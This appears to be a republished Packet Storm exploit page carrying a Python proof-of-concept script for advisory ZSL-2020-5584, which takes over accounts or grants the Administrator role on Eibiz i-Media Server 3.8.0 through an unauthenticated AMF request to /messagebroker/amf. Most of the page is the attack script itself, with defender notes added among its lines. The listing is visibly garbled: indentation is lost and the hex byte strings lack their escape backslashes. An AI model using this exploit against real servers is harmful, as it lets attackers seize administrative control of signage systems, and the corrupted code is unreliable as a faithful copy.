
Published on August 22nd, 2020 📆 | 6425 Views ⚑


Eibiz i-Media Server Digital Signage 3.8.0 Remote Privilege Escalation / Account Takeover ≈ Packet Storm



#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Eibiz i-Media Server Digital Signage 3.8.0 Remote Privilege Escalation / Account Takeover
#
#
# Vendor: EIBIZ Co.,Ltd.
# Product web page: http://www.eibiz.co.th
# Affected version: <= 3.8.0
#
# Summary: EIBIZ develop advertising platform for out of home media in that
# time the world called "Digital Signage". Because most business customers
# still need get outside to get in touch which products and services. Online
# media alone cannot serve them right place, right time.
#
# Desc: The application suffers from an unauthenticated remote privilege escalation
# and account takeover vulnerability that can be triggered by directly calling the
# updateUser object (part of ActionScript object graphs), effectively elevating to
# an administrative role or taking over an existing account by modifying the settings.
#
# Tested on: Windows Server 2016
# Windows Server 2012 R2
# Windows Server 2008 R2
# Apache Flex
# Apache Tomcat/6.0.14
# Apache-Coyote/1.1
# BlazeDS Application
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2020-5584
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5584.php
#
#
# 26.07.2020
#
#

import requests
import sys#####|
import re##### |
############# |
############ |
########### |
########## |
######### |
######## |
####### |
###### |
##### |
#PoC |
### |
## |
# |
class Escalada:
# Proof-of-concept for advisory ZSL-2020-5584: it builds one AMF remoting
# message and POSTs it to the server's message broker endpoint.
# NOTE(review): the listing on this page has lost its indentation and does not
# look like a faithful copy of the original script; refer to the advisory URL
# in the file header for the authoritative text.
#
# Defender notes, based on what this listing sends:
#   * Request: POST to /messagebroker/amf with Content-Type application/x-amf.
#     The advisory describes the call as unauthenticated, so requests to this
#     path from clients that have not logged in are worth alerting on.
#   * The User-Agent and JSESSIONID values set in __init__ are fixed strings
#     chosen by the script. They can be matched in logs but are trivially
#     changed, so do not rely on them alone.
#   * Effect described by the advisory: the caller sets an account's settings,
#     including its role. Review the user list for unexpected role changes and
#     unknown administrative accounts.
#   * Mitigation to confirm with the vendor: enforce authentication and
#     server-side authorization on the updateUser remoting call, and keep the
#     management interface off untrusted networks.

# Set the fixed request parameters and the placeholders that usage() and amf()
# fill in later.
def __init__(self):
# Fixed session id, sent as the JSESSIONID cookie in amf().
self.session = "11111111112222222222333333333344"
# Fixed User-Agent header value.
self.agent = "DigitalSigner/25.1"
# Default display name; replaced by the fourth argument in usage().
self.display = "Intruder Alert"
# Path of the AMF endpoint, appended to the target address.
self.ep = "/messagebroker/amf"
# Default role; replaced in usage().
self.suprole = "Designer"
self.serialize = None
self.address = None
self.usrname = None
self.passwrd = None
self.headers = None

# Read the target and account values from the command line.
# With fewer than four arguments it prints the usage text and exits with
# status 21.
def usage(self):
if len(sys.argv) < 5:
print("i-Media Server Digital Signage 3.8.0 Privilege Escalation")
print("Usage: ./poc.py [ip] [username] [password] [displayname] [role]")
print("Example: ./poc.py 192.168.1.1 testingus 111111 Backdoor Administrator")
exit(21)
else:
self.address = sys.argv[1]
self.usrname = sys.argv[2]
self.passwrd = sys.argv[3]
self.display = sys.argv[4]
# The role is the optional fifth argument; "Administrator" is used when it is
# omitted. The role names the script lists are shown in the comment below.
self.suprole = (bytes("Administrator".encode("utf-8")) if len(sys.argv) < 6 else sys.argv[5])
#__
# | Administrator __
# | Designer __
# | Reporter __
# | Approver
# A scheme is added only when the string "http" occurs nowhere in the address.
if not "http" in self.address:
self.address = "http://{}".format(self.address)

# Build the request headers and the serialized message, send it, and report
# the outcome from the response text.
def amf(self):
# The original author notes the cookie is not needed, which is consistent with
# the advisory's statement that the call is unauthenticated.
self.cookies = {"JSESSIONID" : self.session} # not really needed
self.headers = {"User-Agent" : self.agent,
"Accept" : "*/*",
"Accept-Language" : "en-US,en;q=0.5",
"Accept-Encoding" : "gzip, deflate",
"Origin" : self.address,
"Connection" : "close",
"Referer" : self.address + "/main.swf",
"Content-Type" : "application/x-amf"}

# Fixed leading part of the message. Per the advisory it invokes the
# updateUser operation.
self.serialize = b"x00x03x00x00x00x01x00x04x6Ex75x6Cx6C"
self.serialize += b"x00x03x2Fx35x38x00x00x01xFEx0Ax00x00"
self.serialize += b"x00x01x11x0Ax81x13x4Fx66x6Cx65x78x2E"
self.serialize += b"x6Dx65x73x73x61x67x69x6Ex67x2Ex6Dx65"
self.serialize += b"x73x73x61x67x65x73x2Ex52x65x6Dx6Fx74"
self.serialize += b"x69x6Ex67x4Dx65x73x73x61x67x65x0Dx73"
self.serialize += b"x6Fx75x72x63x65x13x6Fx70x65x72x61x74"
self.serialize += b"x69x6Fx6Ex13x6Dx65x73x73x61x67x65x49"
self.serialize += b"x64x13x74x69x6Dx65x73x74x61x6Dx70x09"
self.serialize += b"x62x6Fx64x79x11x63x6Cx69x65x6Ex74x49"
self.serialize += b"x64x17x64x65x73x74x69x6Ex61x74x69x6F"
self.serialize += b"x6Ex15x74x69x6Dx65x54x6Fx4Cx69x76x65"
self.serialize += b"x0Fx68x65x61x64x65x72x73x01x06x15x75"
self.serialize += b"x70x64x61x74x65x55x73x65x72x06x49x31"
self.serialize += b"x42x38x39x37x41x38x36x2Dx37x33x42x45"
self.serialize += b"x2Dx30x35x42x31x2Dx43x45x42x33x2Dx41"
self.serialize += b"x30x35x35x30x39x36x34x31x31x34x34x04"
self.serialize += b"x00x09x05x01x0Ax81x73x1Bx64x73x2Ex6D"
self.serialize += b"x6Fx64x65x6Cx2Ex55x73x65x72x11x70x61"
self.serialize += b"x73x73x77x6Fx72x64x0Dx63x72x65x61x74"
self.serialize += b"x65x07x74x65x6Cx07x66x61x78x09x6Ex61"
self.serialize += b"x6Dx65x0Fx61x64x64x72x65x73x73x0Dx75"
self.serialize += b"x70x64x61x74x65x05x69x64x0Dx6Dx6Fx62"
self.serialize += b"x69x6Cx65x0Fx75x44x65x6Cx65x74x65x15"
self.serialize += b"x64x65x70x61x72x74x6Dx65x6Ex74x09x72"
self.serialize += b"x6Fx75x6Cx65x09x72x65x61x64x0Bx65x6Dx61"
self.serialize += b"x69x6Cx0Fx63x6Fx6Dx70x61x6Ex79x06" #-"

# Password from the command line, preceded by one byte derived from its length.
self.bytecount = len(self.passwrd * 2) + 1
self.bytesdata = [self.bytecount]
self.serialize += "".join(map(chr, self.bytesdata))

self.serialize += (bytes(self.passwrd.encode("utf-8"))) #-----------"
self.serialize += b"x03x06x19x31x31x31x2Dx32x32x32x2Dx33"
self.serialize += b"x33x33x33x06x19x33x33x33x2Dx32x32x32"
self.serialize += b"x2Dx31x31x31x31x06" #---------------------"

# Display name, appended the same way.
self.bytecount = len(self.display * 2) + 1
self.bytesdata = [self.bytecount]
self.serialize += "".join(map(chr, self.bytesdata))





self.serialize += (bytes(self.display.encode("utf-8"))) #-----------"
self.serialize += b"x06x1Fx49x6Dx61x67x69x6Ex61x72x79x53"
self.serialize += b"x74x72x65x65x74x03x06" #-----------------"

# Username, appended the same way.
self.bytecount = len(self.usrname * 2) + 1
self.bytesdata = [self.bytecount]
self.serialize += "".join(map(chr, self.bytesdata))

self.serialize += (bytes(self.usrname.encode("utf-8"))) #-----------"
self.serialize += b"x06x01x03x06x11x53x65x63x75x72x69x74"
self.serialize += b"x79x06" #-------------------------------------"

# Role, appended the same way. This is the field the advisory's privilege
# escalation depends on.
self.bytecount = len(self.suprole * 2) + 1
self.bytesdata = [self.bytecount]
self.serialize += "".join(map(chr, self.bytesdata))

self.serialize += (bytes(self.suprole.encode("utf-8"))) #-----------"
self.serialize += b"x03x06x15x7Ax73x6Cx40x77x68x61x2Ex62"
self.serialize += b"x61x06x07x5Ax53x4Cx06x42x01x06x17x75"
self.serialize += b"x73x65x72x53x65x72x76x69x63x65x04x00"
self.serialize += b"x0Ax0Bx01x09x44x53x49x64x06x49x34x41"
self.serialize += b"x35x46x33x33x43x33x2Dx37x31x31x46x2D"
self.serialize += b"x35x38x45x38x2Dx39x30x35x30x2Dx39x35"
self.serialize += b"x44x31x30x30x46x33x44x45x33x45x15x44"
self.serialize += b"x53x45x6Ex64x70x6Fx69x6Ex74x06x0Dx6D"
self.serialize += b"x79x2Dx61x6Dx66x01" #---------------------"

# The same body is sent up to twice. A second POST follows only when the first
# response contains the duplicate-FlexSession error text, so that error in
# server logs shortly before an account change may be a useful correlation
# point.
print("First try...")
req = requests.post(self.address + self.ep, headers=self.headers, cookies=self.cookies, data=self.serialize)
#print(req.text.encode("utf-8"))
if "Detected duplicate HTTP-based FlexSessions" in req.text:
print("Second try...")
req = requests.post(self.address + self.ep, headers=self.headers, cookies=self.cookies, data=self.serialize)
#print(req.text.encode("utf-8"))
# Success is judged only by "AcknowledgeMessage" appearing in the response text.
if "AcknowledgeMessage" in req.text:
print("You are " + self.suprole + " now!")
else:
print("Didn't work.")
exit(0)
else:
print("Try again!")

# Parse the command line, then build and send the request.
def main(self):
self.usage()
self.amf()

# Script entry point: when the file is run directly, construct Escalada and
# call main(), which reads the command line and then sends the request.
if __name__ == '__main__':
Escalada().main()
